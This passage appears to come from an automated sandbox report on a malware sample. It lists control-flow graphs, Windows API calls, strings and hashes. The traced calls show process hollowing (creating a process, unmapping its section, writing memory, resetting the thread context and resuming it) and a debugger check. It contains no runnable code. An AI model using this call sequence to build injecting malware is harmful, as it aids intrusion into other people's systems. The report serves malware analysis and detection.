214e4f9 37173->37175 37174->37175 37175->37175 37176 21e0000 37179 21e0630 37176->37179 37178 21e0005 37180 21e064c 37179->37180 37182 21e1577 37180->37182 37185 21e05b0 37182->37185 37188 21e05dc 37185->37188 37186 21e061e 37187 21e05e2 GetFileAttributesA 37187->37188 37188->37186 37188->37187 37190 21e0420 37188->37190 37191 21e04f3 37190->37191 37192 21e04ff CreateWindowExA 37191->37192 37193 21e04fa 37191->37193 37192->37193 37194 21e0540 PostMessageA 37192->37194 37193->37188 37195 21e055f 37194->37195 37195->37193 37197 21e0110 VirtualAlloc 37195->37197 37198 21e016e 37197->37198 37199 21e0414 37198->37199 37200 21e024a CreateProcessA 37198->37200 37199->37195 37200->37199 37201 21e025f VirtualFree VirtualAlloc Wow64GetThreadContext 37200->37201 37201->37199 37202 21e02a9 ReadProcessMemory 37201->37202 37203 21e02e5 VirtualAllocEx NtWriteVirtualMemory 37202->37203 37204 21e02d5 NtUnmapViewOfSection 37202->37204 37205 21e033b 37203->37205 37204->37203 37206 21e039d WriteProcessMemory Wow64SetThreadContext ResumeThread 37205->37206 37207 21e0350 NtWriteVirtualMemory 37205->37207 37208 21e03fb ExitProcess 37206->37208 37207->37205

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 0 4a4c54-4a4c73 1 4a4c75-4a4c7b 0->1 2 4a4c8c-4a4c96 1->2 3 4a4c7d-4a4c87 1->3 4 4a4cc8-4a4ccf 2->4 5 4a4c98-4a4cbe FillConsoleOutputCharacterW 2->5 3->2 4->1 6 4a4cd1 4->6 5->4 7 4a4cd3-4a4cd8 6->7 8 4a4cda-4a4ce0 7->8 9 4a4ce6-4a4cec 7->9 8->9 9->7 10 4a4cee-4a4cf5 9->10 11 4a4cfb-4a4daf lstrcatW InterlockedExchangeAdd LoadIconW LocalShrink FindAtomW DeleteAtom GetConsoleSelectionInfo call 405340 GetDefaultCommConfigW RaiseException ReadConsoleOutputA WaitForDebugEvent EnumDateFormatsA 10->11 12 4a4ddf 10->12 20 4a4dbc-4a4dc3 11->20 21 4a4db1-4a4db6 TryEnterCriticalSection 11->21 14 4a4de1-4a4e28 GetDateFormatA GetLastError GetSystemTimes 12->14 16 4a4e2a-4a4e31 14->16 17 4a4e35-4a4e3c 14->17 16->14 22 4a4e33 16->22 18 4a4e49-4a4e50 17->18 19 4a4e3e-4a4e43 FoldStringW 17->19 23 4a4ee3-4a4eff LocalAlloc 18->23 24 4a4e56-4a4ee0 GetConsoleAliasesLengthA GetNamedPipeHandleStateA GetComputerNameA GetFileAttributesW GetBinaryTypeA FormatMessageA call 401132 * 2 call 401015 call 401587 call 4010a3 call 401344 18->24 19->18 25 4a4dd1-4a4dde call 4011fc call 401212 20->25 26 4a4dc5-4a4dcf LoadLibraryA * 2 20->26 21->20 22->18 27 4a4f28-4a4f33 LoadLibraryA call 4a4af9 23->27 28 4a4f01-4a4f17 23->28 24->23 25->12 26->25 36 4a4f38-4a4f3d call 4a4bcc 27->36 31 4a4f19 28->31 32 4a4f23-4a4f26 28->32 31->32 32->27 32->28 44 4a4f3f-4a4f46 36->44 46 4a4f48-4a4f50 GlobalFlags GetFileType 44->46 47 4a4f56-4a4f5c 44->47 46->47 50 4a4f5e call 4a4aee 47->50 51 4a4f63-4a4f6a 47->51 50->51 54 4a4f6c-4a4f71 InterlockedDecrement 51->54 55 4a4f77-4a4f7e 51->55 54->55 55->44 56 4a4f80 55->56 58 4a4f8a-4a4f90 56->58 60 4a4f9c-4a4fa3 58->60 61 4a4f92-4a4f9a 58->61 60->58 63 4a4fa5-4a4fb9 call 401006 60->63 61->60 61->63
            APIs
            • FillConsoleOutputCharacterW.KERNEL32(00000000,00000000,00000000,?,?), ref: 004A4CB1
            • lstrcatW.KERNEL32(?,00000000), ref: 004A4D04
            • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004A4D10
            • LoadIconW.USER32(00000000,00000000), ref: 004A4D18
            • LocalShrink.KERNEL32(00000000,00000000), ref: 004A4D20
            • FindAtomW.KERNEL32(00000000), ref: 004A4D27
            • DeleteAtom.KERNEL32(00000000), ref: 004A4D2E
            • GetConsoleSelectionInfo.KERNEL32(00000000), ref: 004A4D35
            • _memset.LIBCMT ref: 004A4D47
            • GetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 004A4D56
            • RaiseException.KERNEL32(00000000,00000000,00000000,00000000), ref: 004A4D60
            • ReadConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 004A4D91
            • WaitForDebugEvent.KERNEL32(00000000,00000000), ref: 004A4D99
            • EnumDateFormatsA.KERNEL32(00000000,00000000,00000000), ref: 004A4DA2
            • TryEnterCriticalSection.KERNEL32(?), ref: 004A4DB6
            • LoadLibraryA.KERNEL32(00000000), ref: 004A4DCC
            • LoadLibraryA.KERNEL32(00000000), ref: 004A4DCF
              • Part of subcall function 004011FC: __wcstoi64.LIBCMT ref: 00401208
            • GetDateFormatA.KERNELBASE(00000000,00000000,?,00000000,?,00000000), ref: 004A4E02
            • GetLastError.KERNEL32 ref: 004A4E08
            • GetSystemTimes.KERNEL32(?,?,?), ref: 004A4E1D
            • FoldStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 004A4E43
            • GetConsoleAliasesLengthA.KERNEL32(00000000,?,?,?), ref: 004A4E63
            • GetNamedPipeHandleStateA.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 004A4E87
            • GetComputerNameA.KERNEL32(00000000,00000000), ref: 004A4E8F
            • GetFileAttributesW.KERNEL32(00000000), ref: 004A4E96
            • GetBinaryTypeA.KERNEL32(00000000,00000000), ref: 004A4E9E
            • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004A4EB2
            • _malloc.LIBCMT ref: 004A4EB9
            • _malloc.LIBCMT ref: 004A4EBF
            • _mbrtowc.LIBCMT ref: 004A4ECE
            • _calloc.LIBCMT ref: 004A4ED5
            • LocalAlloc.KERNELBASE(00000000,?,?,?), ref: 004A4EEA
            • LoadLibraryA.KERNELBASE(msimg32.dll), ref: 004A4F2D
            • GlobalFlags.KERNEL32(00000000), ref: 004A4F49
            • GetFileType.KERNEL32(00000000), ref: 004A4F50
            • InterlockedDecrement.KERNEL32(?), ref: 004A4F71
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2166507918.0000000000413000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2166491883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166507918.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166583336.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166603660.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166628727.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_file.jbxd
            Similarity
            • API ID: ConsoleLoad$Library$AtomDateFileFormatInterlockedLocalOutputType_malloc$AliasesAllocAttributesBinaryCharacterCommComputerConfigCriticalDebugDecrementDefaultDeleteEnterEnumErrorEventExceptionExchangeFillFindFlagsFoldFormatsGlobalHandleIconInfoLastLengthMessageNameNamedPipeRaiseReadSectionSelectionShrinkStateStringSystemTimesWait__wcstoi64_calloc_mbrtowc_memsetlstrcat
            • String ID: k`$msimg32.dll$}$
            • API String ID: 3101043212-3790566034
            • Opcode ID: 5791d8215d3f91d16443f1dfadc125b9ac431809a146679fc14c14fc8110322c
            • Instruction ID: b092476a892429e5236d7ed3d915507f5ebcf53964302e693ca48d81e64aed05
            • Opcode Fuzzy Hash: 5791d8215d3f91d16443f1dfadc125b9ac431809a146679fc14c14fc8110322c
            • Instruction Fuzzy Hash: DC916D7240AA20AFD711AB61ED4889F7FACFFDB314B01053AF64596120C7789605CBEE

            Control-flow Graph

            APIs
            • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 021E0156
            • CreateProcessA.KERNELBASE(?,00000000), ref: 021E0255
            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 021E0270
            • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 021E0283
            • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 021E029F
            • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 021E02C8
            • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 021E02E3
            • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 021E0304
            • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 021E032A
            • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 021E0399
            • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 021E03BF
            • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 021E03E1
            • ResumeThread.KERNELBASE(00000000), ref: 021E03ED
            • ExitProcess.KERNEL32(00000000), ref: 021E0412
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFreeReadResumeSectionUnmapView
            • String ID:
            • API String ID: 3993611425-0
            • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
            • Instruction ID: 8f8595c73389df6e63443c037c18bc6dd2251603d2bf711dd88aff94af7a3ede
            • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
            • Instruction Fuzzy Hash: 74B1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E949AB395D771AE41CF94

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 108 214e7c6-214e7df 109 214e7e1-214e7e3 108->109 110 214e7e5 109->110 111 214e7ea-214e7f6 CreateToolhelp32Snapshot 109->111 110->111 112 214e806-214e813 Module32First 111->112 113 214e7f8-214e7fe 111->113 114 214e815-214e816 call 214e485 112->114 115 214e81c-214e824 112->115 113->112 118 214e800-214e804 113->118 119 214e81b 114->119 118->109 118->112 119->115
            APIs
            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0214E7EE
            • Module32First.KERNEL32(00000000,00000224), ref: 0214E80E
            Memory Dump Source
            • Source File: 00000000.00000002.2166960337.000000000214E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0214E000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_214e000_file.jbxd
            Yara matches
            Similarity
            • API ID: CreateFirstModule32SnapshotToolhelp32
            • String ID:
            • API String ID: 3833638111-0
            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
            • Instruction ID: 0329b0b22604e4c1dabb72d13ac93348d8ebfa376dfb09edbd6ac433736aedbe
            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
            • Instruction Fuzzy Hash: DBF096356407116FD7203BF9A88DF6E76E8BF49635F100638F64AD14C0DF70E8458A61

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 82 21e0420-21e04f8 84 21e04ff-21e053c CreateWindowExA 82->84 85 21e04fa 82->85 87 21e053e 84->87 88 21e0540-21e0558 PostMessageA 84->88 86 21e05aa-21e05ad 85->86 87->86 89 21e055f-21e0563 88->89 89->86 90 21e0565-21e0579 89->90 90->86 92 21e057b-21e0582 90->92 93 21e05a8 92->93 94 21e0584-21e0588 92->94 93->89 94->93 95 21e058a-21e0591 94->95 95->93 96 21e0593-21e0597 call 21e0110 95->96 98 21e059c-21e05a5 96->98 98->93
            APIs
            • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 021E0533
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID: CreateWindow
            • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
            • API String ID: 716092398-2341455598
            • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
            • Instruction ID: 2e4ddab74d1773d267efb26786ed576d33cbc0bb982a63184a1bc8d27e709d51
            • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
            • Instruction Fuzzy Hash: 0C511570D48388DAEF11CBA8C849B9DBFB2AF15708F144058D5497F286C3FA5658CB62

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 99 21e05b0-21e05d5 100 21e05dc-21e05e0 99->100 101 21e061e-21e0621 100->101 102 21e05e2-21e05f5 GetFileAttributesA 100->102 103 21e05f7-21e05fe 102->103 104 21e0613-21e061c 102->104 103->104 105 21e0600-21e060b call 21e0420 103->105 104->100 107 21e0610 105->107 107->104
            APIs
            • GetFileAttributesA.KERNELBASE(apfHQ), ref: 021E05EC
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID: AttributesFile
            • String ID: apfHQ$o
            • API String ID: 3188754299-2999369273
            • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
            • Instruction ID: 7463fc751c9a60c7151aae0d1882bc5f3bb7696099cee55123814b24a3b83969
            • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
            • Instruction Fuzzy Hash: C70121B0C0425CEEDF15DB98C9183AEBFB5AF45308F1480D9C4193B241D7B69B59CBA1

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 121 4018e3-401905 HeapCreate 122 401907-401908 121->122 123 401909-401912 121->123
            APIs
            • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 004018F8
            Memory Dump Source
            • Source File: 00000000.00000002.2166507918.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2166491883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166507918.0000000000413000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166583336.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166603660.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166628727.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_file.jbxd
            Similarity
            • API ID: CreateHeap
            • String ID:
            • API String ID: 10892065-0
            • Opcode ID: e0ae348e57a1640f56999969388b7f3a75df213f05cb8d9c57eb372c2ca0b7c0
            • Instruction ID: 0521dfff21353c82e6d8bb3565faade79993b3ce62176af17b15262ef703f01f
            • Opcode Fuzzy Hash: e0ae348e57a1640f56999969388b7f3a75df213f05cb8d9c57eb372c2ca0b7c0
            • Instruction Fuzzy Hash: 49D0A7765543099FEB005F70BD097263FDCE784795F11443AB80CC6190F5B4D950C658

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 124 4a4af9-4a4b16 VirtualProtect
            APIs
            • VirtualProtect.KERNELBASE(00000040,?), ref: 004A4B0F
            Memory Dump Source
            • Source File: 00000000.00000002.2166507918.0000000000413000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2166491883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166507918.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166583336.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166603660.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166628727.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_file.jbxd
            Similarity
            • API ID: ProtectVirtual
            • String ID:
            • API String ID: 544645111-0
            • Opcode ID: 80cfd3fad95082e6780993ff03abba3a954a7b3543cb466057069dbc5f75cd08
            • Instruction ID: fc6120e5f8c29d800887ade1f0fae858c54a7ae38f9f56ae3dcdcb0239f94a04
            • Opcode Fuzzy Hash: 80cfd3fad95082e6780993ff03abba3a954a7b3543cb466057069dbc5f75cd08
            • Instruction Fuzzy Hash: DCC012B2100108BBDA018B81ED01E493BACA309204B010120AA02A1460C275A900AB68

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 125 214e485-214e4bf call 214e798 128 214e4c1-214e4f4 VirtualAlloc call 214e512 125->128 129 214e50d 125->129 131 214e4f9-214e50b 128->131 129->129 131->129
            APIs
            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0214E4D6
            Memory Dump Source
            • Source File: 00000000.00000002.2166960337.000000000214E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0214E000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_214e000_file.jbxd
            Yara matches
            Similarity
            • API ID: AllocVirtual
            • String ID:
            • API String ID: 4275171209-0
            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
            • Instruction ID: d02e78aaa69700712037bbe93b8793d3f4cb29fdb61bd3174b14e3a3f48c17d0
            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
            • Instruction Fuzzy Hash: A2113C79A40208EFDB01DF98C985E99BFF5AF08351F058094F9489B361D775EA90EF80
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID: _memset$_free_malloc_strstr$_wcsstr
            • String ID: "
            • API String ID: 430003804-123907689
            • Opcode ID: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
            • Instruction ID: 146bb09d690bb13c289139db96ade76ba0959ce54ed04ccd29121ccbdd4fc5b7
            • Opcode Fuzzy Hash: 1cdb3d0636dac09cc2f24788c7c1d72f8c986b6e2997366a203cf509162b2016
            • Instruction Fuzzy Hash: ED42C271548340ABD760DF64CC88B9B7BE9BF85304F04052DF699972D1DBB4D50ACBA2
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID: _memset
            • String ID: <$x2Q
            • API String ID: 2102423945-643667464
            • Opcode ID: 273cca7cb529547cd63a08c43d9310bac8ca78855d9082cfb023d6999fed1edd
            • Instruction ID: fa394b9280948bf223535640ce300dd94f51dcc64033c7b9b77f36f168b3d87b
            • Opcode Fuzzy Hash: 273cca7cb529547cd63a08c43d9310bac8ca78855d9082cfb023d6999fed1edd
            • Instruction Fuzzy Hash: 3DD2D2715483419FD764EF60DC94B9FBBE6BF84304F00092DE6A687291EB71A609CF92
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
            • Instruction ID: 55ef7daa52112fdd0ab61a5c74dce570af07e5490eab27aaa2d7822279c2e88f
            • Opcode Fuzzy Hash: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
            • Instruction Fuzzy Hash: 8D529171D00208DFDF54DFA8C895BDEB7B5BF08308F108169D929A7296E731AA49CF91
            APIs
            • _wcsstr.LIBCMT ref: 021EE72D
            • _wcsstr.LIBCMT ref: 021EE756
            • _memset.LIBCMT ref: 021EE784
              • Part of subcall function 0222FC0C: std::exception::exception.LIBCMT ref: 0222FC1F
              • Part of subcall function 0222FC0C: __CxxThrowException@8.LIBCMT ref: 0222FC34
              • Part of subcall function 0222FC0C: std::exception::exception.LIBCMT ref: 0222FC4D
              • Part of subcall function 0222FC0C: __CxxThrowException@8.LIBCMT ref: 0222FC62
              • Part of subcall function 0222FC0C: std::regex_error::regex_error.LIBCPMT ref: 0222FC74
              • Part of subcall function 0222FC0C: __CxxThrowException@8.LIBCMT ref: 0222FC82
              • Part of subcall function 0222FC0C: std::exception::exception.LIBCMT ref: 0222FC9B
              • Part of subcall function 0222FC0C: __CxxThrowException@8.LIBCMT ref: 0222FCB0
            • _wcsstr.LIBCMT ref: 021EEA0C
            • _memset.LIBCMT ref: 021EEE5C
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID: Exception@8Throw$_wcsstrstd::exception::exception$_memset$std::regex_error::regex_error
            • String ID:
            • API String ID: 1338678108-0
            • Opcode ID: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
            • Instruction ID: 197d5310f76d1f667d300f9dd39d7497237064bd1c2281528bbd429e58c4c663
            • Opcode Fuzzy Hash: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
            • Instruction Fuzzy Hash: 0D52CC71A006099FDF28CFA8CC94BAEBBF1BF04314F184569E85AAB381D7319945CF91
            APIs
            • IsDebuggerPresent.KERNEL32 ref: 00401843
            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00401858
            • UnhandledExceptionFilter.KERNEL32(004A51A4), ref: 00401863
            • GetCurrentProcess.KERNEL32(C0000409), ref: 0040187F
            • TerminateProcess.KERNEL32(00000000), ref: 00401886
            Memory Dump Source
            • Source File: 00000000.00000002.2166507918.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2166491883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166507918.0000000000413000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166583336.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166603660.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166628727.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_file.jbxd
            Similarity
            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
            • String ID:
            • API String ID: 2579439406-0
            • Opcode ID: 313e26b37b6aad3856cce21f4f68d9930ca37da32529b455288ead154de7cfcb
            • Instruction ID: 77f385502be5376345618d709b9d90bf989298676451deb14fbc0e8ef9620649
            • Opcode Fuzzy Hash: 313e26b37b6aad3856cce21f4f68d9930ca37da32529b455288ead154de7cfcb
            • Instruction Fuzzy Hash: 3521C9B8C05244AFD754DF29EE846483FE4FB1A354F90443EE908972B0EBB459868F4E
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
            • Instruction ID: 704f159f162d0f98b901ab2a80d6c9013a3b278d0fb1fc4fb84c41471dede7bc
            • Opcode Fuzzy Hash: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
            • Instruction Fuzzy Hash: ED429171D00208DBDF54DFA4C898BDEB7F5BF08308F244169D529A7295EB31AA05CFA5
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
            • Instruction ID: de729955cea947d453eb967f23ac2c7a470eb9a9e275caa0fac04c4df4f397fb
            • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
            • Instruction Fuzzy Hash: EF526070E40649DFDF14DBA4CC84FAEBBB5BF49714F148198E506AB290DB31AE45CBA0
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
            • String ID: $
            • API String ID: 0-3993045852
            • Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
            • Instruction ID: b4267dfb1f84b4d596003467ad3a111b64fa16444a18fa946566bdc492e7e9f9
            • Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
            • Instruction Fuzzy Hash: BE3264B1D103299ADF619FA4CC44BAEB7B9FF44704F0041EAEA0CA6194DB758AC0CF59
            APIs
            • GetLocaleInfoA.KERNEL32(?,00001004,?,00000006,?,?,?,?,00000001,?,?,?,?,?,?), ref: 004070D5
            Memory Dump Source
            • Source File: 00000000.00000002.2166507918.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2166491883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166507918.0000000000413000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166583336.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166603660.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166628727.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_file.jbxd
            Similarity
            • API ID: InfoLocale
            • String ID:
            • API String ID: 2299586839-0
            • Opcode ID: 5faa10b47f60b665d7ebce3cb119823e71116df984a4b0d70eafbf0d05adf920
            • Instruction ID: c3555afdbd9e49c5ee7ef628b92b8580283ce001db98aa8b56ca0ecc3d199398
            • Opcode Fuzzy Hash: 5faa10b47f60b665d7ebce3cb119823e71116df984a4b0d70eafbf0d05adf920
            • Instruction Fuzzy Hash: F9F0E530E0824CBADB00DBA5C905B9E7BA99B08318F10427AF611EA1D0DA74D604974A
            APIs
            • SetUnhandledExceptionFilter.KERNEL32(Function_00004303), ref: 0040434A
            Memory Dump Source
            • Source File: 00000000.00000002.2166507918.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2166491883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166507918.0000000000413000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166583336.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166603660.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2166628727.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_file.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            • Opcode ID: 0464c316f5abd1ac6647144c6733b89db666b849430c6a1be2adecd54bd6899b
            • Instruction ID: 4d3d4f337b0e99a02e2c0b81fafaa4f5824c520ad6a32c821d547c41a813ff2f
            • Opcode Fuzzy Hash: 0464c316f5abd1ac6647144c6733b89db666b849430c6a1be2adecd54bd6899b
            • Instruction Fuzzy Hash: D29002A03565018A960017705E5960529925BB9B0275215716A41D8098DAB44501555A
            Memory Dump Source
            • Source File: 00000000.00000002.2167039345.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_21e0000_file.jbxd
            Yara matches
            Similarity
            • API ID:
